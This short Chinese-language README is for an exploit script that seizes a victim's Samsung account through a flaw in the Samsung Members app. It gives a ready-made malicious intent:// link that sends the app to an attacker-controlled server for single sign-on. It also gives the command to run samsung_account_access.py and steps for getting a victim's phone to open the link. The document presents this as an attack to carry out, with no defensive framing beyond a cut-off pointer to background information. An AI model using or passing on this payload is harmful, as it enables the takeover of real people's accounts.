此脚本可用于获取受害者 Samsung 账户的访问权限,前提是受害者的三星设备上安装了特定版本的 Samsung Members,并且设备来自美国或韩国地区。
<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay 点这里 yay</a>
注意:将 "<attacker IP>" 替换为你运行此脚本所用的 IP 地址。
python3 ./samsung_account_access.py
使用一部三星手机,浏览到 Web 服务器并点击该链接
让脚本自动执行
关于此脚本所利用问题的更多信息,请参见此处: